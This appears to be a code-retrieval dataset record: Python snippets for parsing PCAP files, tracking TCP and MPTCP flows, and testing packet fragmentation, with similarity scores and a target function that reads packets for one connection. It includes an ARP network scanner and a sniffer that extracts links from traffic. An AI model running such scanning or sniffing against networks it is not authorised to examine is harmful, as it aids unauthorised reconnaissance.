self.assertEqual(sent[Raw].payload, recvd[Raw].payload)", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, dport][SEQ_C2S]:\n # This is a retransmission! (take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def test():\n with open('univ1_pt8.pcap', 'rb') as f: #univ1_trace/univ1_pt8\n pcap = Reader(f)\n print_packets(pcap)\n # top_flows()\n host_pairs()", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def get_all_flow(self, conf, dpid):\n\t\tpass", "def udp_pkt_cap(port=None, cnt=125):\n if not port:\n udp_port = 2368\n else:\n udp_port = port\n\n # type: udp socket\n udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\n # Enable the SO_REUSEADDR option\n udpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n new_state = udpSocket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)\n # print(\"New sock state: %s\" % new_state)\n\n # bind socket\n try:\n udpSocket.bind((\"\", udp_port))\n udpSocket.settimeout(0.06)\n except socket.error as err_msg:\n print(\"Udp socket message:%s\" % err_msg)\n return\n\n udp_buf = 1304\n pkt_cnt = cnt\n messages = []\n while True:\n dat, add = udpSocket.recvfrom(udp_buf)\n if (dat[0:2] == b'\\xaa\\xaa') or (dat[0:2] == b'\\xbb\\xbb') or (dat[0:2] == b'\\xcc\\xcc'):\n # print(add[0], add[1], hex(ord(dat[2])) + '{:02x}'.format(ord(dat[3])) )\n # print(add[0], add[1], '0x{:02X} 0x{:02X}'.format(dat[2], dat[3]))\n print(\"Recv ok source ip and port is \", add)\n messages.append(dat + b'\\n')\n if pkt_cnt > 1:\n for _ in range(pkt_cnt - 1):\n datfrm, add = udpSocket.recvfrom(udp_buf)\n messages.append(datfrm + b'\\n')\n break\n else:\n break\n\n return messages # return string", "def scan(ip):\n arp_request = scapy.ARP(pdst=ip)\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp_request_broadcast = broadcast/arp_request\n answered_list = scapy.srp(arp_request_broadcast , timeout = 1, verbose=False)[0]\n target_list=[]\n for element in answered_list:\n target_dict = {\"ip\":element[1].psrc, \"mac\":element[1].hwsrc}\n target_list.append(target_dict)\n return target_list", "def testParse(self):\n parser = pcap.PcapParser()\n storage_writer = self._ParseFile(['test.pcap'], parser)\n\n # PCAP information:\n # Number of streams: 96 (TCP: 47, UDP: 39, ICMP: 0, Other: 10)\n #\n # For each stream 2 events are generated one for the start\n # and one for the end time.\n\n self.assertEqual(storage_writer.number_of_events, 192)\n\n events = list(storage_writer.GetEvents())\n\n # Test stream 3 (event 6).\n # Protocol: TCP\n # Source IP: 192.168.195.130\n # Dest IP: 63.245.217.43\n # Source Port: 1038\n # Dest Port: 443\n # Stream Type: SSL\n # Starting Packet: 4\n # Ending Packet: 6\n\n event = events[6]\n self.assertEqual(event.packet_count, 3)\n self.assertEqual(event.protocol, 'TCP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '63.245.217.43')\n self.assertEqual(event.dest_port, 443)\n self.assertEqual(event.source_port, 1038)\n self.assertEqual(event.stream_type, 'SSL')\n self.assertEqual(event.first_packet_id, 4)\n self.assertEqual(event.last_packet_id, 6)\n\n # Test stream 6 (event 12).\n # Protocol: UDP\n # Source IP: 192.168.195.130\n # Dest IP: 192.168.195.2\n # Source Port: 55679\n # Dest Port: 53\n # Stream Type: DNS\n # Starting Packet: 4\n # Ending Packet: 6\n # Protocol Data: DNS Query for wpad.localdomain\n\n event = events[12]\n self.assertEqual(event.packet_count, 5)\n self.assertEqual(event.protocol, 'UDP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '192.168.195.2')\n self.assertEqual(event.dest_port, 53)\n self.assertEqual(event.source_port, 55679)\n self.assertEqual(event.stream_type, 'DNS')\n self.assertEqual(event.first_packet_id, 11)\n self.assertEqual(event.last_packet_id, 1307)\n self.assertEqual(\n event.protocol_data, 'DNS Query for wpad.localdomain')\n\n expected_message = (\n 'Source IP: 192.168.195.130 '\n 'Destination IP: 192.168.195.2 '\n 'Source Port: 55679 '\n 'Destination Port: 53 '\n 'Protocol: UDP '\n 'Type: DNS '\n 'Size: 380 '\n 'Protocol Data: DNS Query for wpad.localdomain '\n 'Stream Data: \\'\\\\xb8\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00'\n '\\\\x00\\\\x00\\\\x04wpad\\\\x0blocaldomain\\\\x00\\\\x00\\\\x01\\\\x00\\\\x01\\\\xb8'\n '\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x04wpa\\' '\n 'First Packet ID: 11 '\n 'Last Packet ID: 1307 '\n 'Packet Count: 5')\n expected_short_message = (\n 'Type: DNS '\n 'First Packet ID: 11')\n\n self._TestGetMessageStrings(event, expected_message, expected_short_message)", "def test_fif6(self):\n # TODO this should be ideally in setUpClass, but then we hit a bug\n # with VppIpRoute incorrectly reporting it's present when it's not\n # so we need to manually remove the vpp config, thus we cannot have\n # it shared for multiple test cases\n self.tun_ip6 = \"1002::1\"\n\n self.gre6 = VppGreInterface(self, self.src_if.local_ip6, self.tun_ip6)\n self.gre6.add_vpp_config()\n self.gre6.admin_up()\n self.gre6.config_ip6()\n\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.gre6.sw_if_index, enable_ip6=True\n )\n\n self.route6 = VppIpRoute(\n self,\n self.tun_ip6,\n 128,\n [VppRoutePath(self.src_if.remote_ip6, self.src_if.sw_if_index)],\n )\n self.route6.add_vpp_config()\n\n self.reset_packet_infos()\n for i in range(test_packet_count):\n info = self.create_packet_info(self.src_if, self.dst_if)\n payload = self.info_to_payload(info)\n # Ethernet header here is only for size calculation, thus it\n # doesn't matter how it's initialized. This is to ensure that\n # reassembled packet is not > 9000 bytes, so that it's not dropped\n p = (\n Ether()\n / IPv6(src=self.src_if.remote_ip6, dst=self.dst_if.remote_ip6)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n size = self.packet_sizes[(i // 2) % len(self.packet_sizes)]\n self.extend_packet(p, size, self.padding)\n info.data = p[IPv6] # use only IPv6 part, without ethernet header\n\n fragments = [\n x\n for _, i in self._packet_infos.items()\n for x in fragment_rfc8200(i.data, i.index, 400)\n ]\n\n encapped_fragments = [\n Ether(dst=self.src_if.local_mac, src=self.src_if.remote_mac)\n / IPv6(src=self.tun_ip6, dst=self.src_if.local_ip6)\n / GRE()\n / p\n for p in fragments\n ]\n\n fragmented_encapped_fragments = [\n x\n for p in encapped_fragments\n for x in (\n fragment_rfc8200(\n p, 2 * len(self._packet_infos) + p[IPv6ExtHdrFragment].id, 200\n )\n if IPv6ExtHdrFragment in p\n else [p]\n )\n ]\n\n self.src_if.add_stream(fragmented_encapped_fragments)\n\n self.pg_enable_capture(self.pg_interfaces)\n self.pg_start()\n\n self.src_if.assert_nothing_captured()\n packets = self.dst_if.get_capture(len(self._packet_infos))\n self.verify_capture(packets, IPv6)\n\n # TODO remove gre vpp config by hand until VppIpRoute gets fixed\n # so that it's query_vpp_config() works as it should\n self.gre6.remove_vpp_config()", "def process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n flow_id = acks[saddr, sport, daddr, dport][co.FLOW_ID]\n if conn_acks[conn_id][co.S2C] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.S2C]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_C2S] and (dss - conn_acks[conn_id][co.C2S]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.C2S][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission! (take into account the seq overflow)\n mptcp_connections[conn_id].attr[co.C2S][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_C2S][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]))\n conn_acks[conn_id][HSEQ_C2S][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_C2S].add(dss)\n conn_acks[conn_id][HSEQ_C2S][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]]\n\n conn_acks[conn_id][co.S2C] = dack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][CLIENT] = ts_delta" ]
[ "0.6305733", "0.6296941", "0.6157458", "0.5966342", "0.58530146", "0.58158106", "0.5761478", "0.5597372", "0.5591383", "0.5550107", "0.5509687", "0.5483427", "0.5468516", "0.54531425", "0.53616995", "0.52512836", "0.5180603", "0.51701915", "0.5169873", "0.5168804", "0.51653785", "0.5126963", "0.51233846", "0.5106145", "0.50977445", "0.5079675", "0.5016412", "0.50007594", "0.49968618", "0.49965763", "0.49953368", "0.49942407", "0.49909738", "0.49820396", "0.49802232", "0.49529237", "0.48943526", "0.48707145", "0.4865862", "0.48598737", "0.48381108", "0.48112306", "0.4807113", "0.4805623", "0.47978213", "0.47846407", "0.47839126", "0.47786963", "0.4777329", "0.47735485", "0.47603983", "0.47534236", "0.4752056", "0.47424507", "0.474191", "0.473586", "0.4734663", "0.47344148", "0.473373", "0.4728742", "0.46955514", "0.46919352", "0.46884263", "0.46799234", "0.46770468", "0.46714595", "0.4668274", "0.46682003", "0.4660133", "0.465304", "0.46490636", "0.46447363", "0.46406952", "0.4638043", "0.46327043", "0.46297887", "0.4626025", "0.46151245", "0.46071598", "0.4598257", "0.45967638", "0.45846555", "0.4576061", "0.4565716", "0.45650145", "0.4563647", "0.45631775", "0.45631775", "0.45470515", "0.45437267", "0.45422474", "0.45300284", "0.45286772", "0.4526037", "0.45260283", "0.452305", "0.45210886", "0.45167777", "0.4512437", "0.451243" ]
0.67187
0
Open a PCAP, seek to a packet offset, then get all packets belonging to the same connection
def packets_for_stream(fobj, offset): pcap = dpkt.pcap.Reader(fobj) pcapiter = iter(pcap) ts, raw = pcapiter.next() fobj.seek(offset) for p in next_connection_packets(pcapiter, linktype=pcap.datalink()): yield p
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size = len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def pcap(self, fname):\n\t\tcap = pcapy.open_offline(fname)\n\n\t\tself.map = []\n\t\tself.p = PacketDecoder()\n\t\tcap.loop(0, self.process)\n\n\t\treturn self.map", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def test():\n with open('univ1_pt8.pcap', 'rb') as f: #univ1_trace/univ1_pt8\n pcap = Reader(f)\n print_packets(pcap)\n # top_flows()\n host_pairs()", "def find_dac():\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.bind((\"0.0.0.0\", 7654))\n\n\twhile True:\n\t\tdata, addr = s.recvfrom(1024)\n\t\tbp = BroadcastPacket(data)\n\t\t\n\t\tprint \"Packet from %s: \" % (addr, )\n\t\tbp.dump()", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == '5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def pull(self):\n\n # For each packet in the pcap process the contents\n for item in self.input_stream:\n\n # Print out the timestamp in UTC\n print('%s -' % item['timestamp'], end='')\n\n # Transport info\n if item['transport']:\n print(item['transport']['type'], end='')\n\n # Print out the Packet info\n packet_type = item['packet']['type']\n print(packet_type, end='')\n packet = item['packet']\n if packet_type in ['IP', 'IP6']:\n # Is there domain info?\n if 'src_domain' in packet:\n print('%s(%s) --> %s(%s)' % (net_utils.inet_to_str(packet['src']), packet['src_domain'],\n net_utils.inet_to_str(packet['dst']), packet['dst_domain']), end='')\n else:\n print('%s --> %s' % (net_utils.inet_to_str(packet['src']), net_utils.inet_to_str(packet['dst'])), end='')\n else:\n print(str(packet))\n\n # Only include application if we have it\n if item['application']:\n print('Application: %s' % item['application']['type'], end='')\n print(str(item['application']), end='')\n\n # Just for newline\n print()", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def recv_raw(self) -> Dict[str, Any]:\n while True:\n try:\n packet = self.__recv_frame()\n except UnknownPacketException:\n continue\n\n # Hack for sniffing on localhost\n if packet['address']['interface'] == 'lo' and packet['address']['type'] != 4:\n continue\n\n if self.address and self.port:\n if (\n packet['ip_header']['source_address'] == self.address and\n packet['tcp_header']['source_port'] == self.port\n ):\n return packet\n if (\n packet['ip_header']['destination_address'] == self.address and\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n elif self.address:\n if (\n packet['ip_header']['source_address'] == self.address or\n packet['ip_header']['destination_address'] == self.address\n ):\n return packet\n elif self.port:\n if (\n packet['tcp_header']['source_port'] == self.port or\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n else:\n return packet", "def extract_tstat_data(pcap_filepath):\n connections = {}\n conn_id = 0\n print('We are here')\n with co.cd(os.path.basename(pcap_filepath[:-5])):\n with co.cd(os.listdir('.')[0]):\n print(connections)\n # Complete TCP connections\n connections, conn_id = extract_tstat_data_tcp_complete('log_tcp_complete', connections, conn_id)\n # Non complete TCP connections (less info, but still interesting data)\n connections, conn_id = extract_tstat_data_tcp_nocomplete('log_tcp_nocomplete', connections, conn_id)\n\n return connections", "def next_packet(filename, memorymap=True):\n with open(filename, 'rb') as f:\n \n #memory map the file if necessary (prob requires 64 bit systems)\n _file = f\n if memorymap:\n _file = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\n \n while True:\n packet = _file.read(TS.PACKET_SIZE)\n if packet:\n # first byte SHOULD be the sync byte\n # but if it isn't find one.\n if packet[0] != TS.SYNC_BYTE:\n start_byte = 0\n print packet[0]\n for i in range(start_byte, TS.PACKET_SIZE):\n if packet[i] == TS.SYNC_BYTE:\n start_byte = i\n break\n # didn't find a new start? FAIL\n if start_byte == 0:\n raise Exception(\"failure to find sync byte in ts packet size.\")\n continue\n remainder = _file.read(TS.PACKET_SIZE - start_byte)\n packet = packet[start_byte:] + remainder\n yield packet\n else:\n break", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp 